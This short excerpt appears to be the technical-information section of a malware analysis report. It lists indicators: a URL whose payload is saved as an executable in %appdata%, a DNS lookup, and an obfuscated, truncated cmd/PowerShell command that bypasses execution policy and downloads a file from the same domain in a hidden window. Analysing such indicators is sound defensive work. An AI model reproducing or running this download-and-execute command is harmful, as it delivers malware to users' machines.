Technical Information
- http://www.zoerpoled.top/read.php?f=1.gif as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^OwERShelL^.e^x^e^ -exECU^tIo^np^oLicy by^pASs^ -^n^oP^R^oFILe^ -w^I^n^D^Ow^StYlE^ Hi^dden ^(^N^EW^-OBj^e^ct syST^eM.n^ET^.^We^Bc^LIent)^.doW^nloAD^fil^E('http://www.zoerpole...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "p^OwERShelL^.e^x^e^ -exECU^tIo^np^oLicy by^pASs^ -^n^oP^R^oFILe^ -w^I^n^D^Ow^StYlE^ Hi^dden ^(^N^EW^-OBj^e^ct syST^eM.n^ET^.^We^Bc^LIent)^.doW^nloAD^fil^E('http://www.zoerpole...' (with hidden window)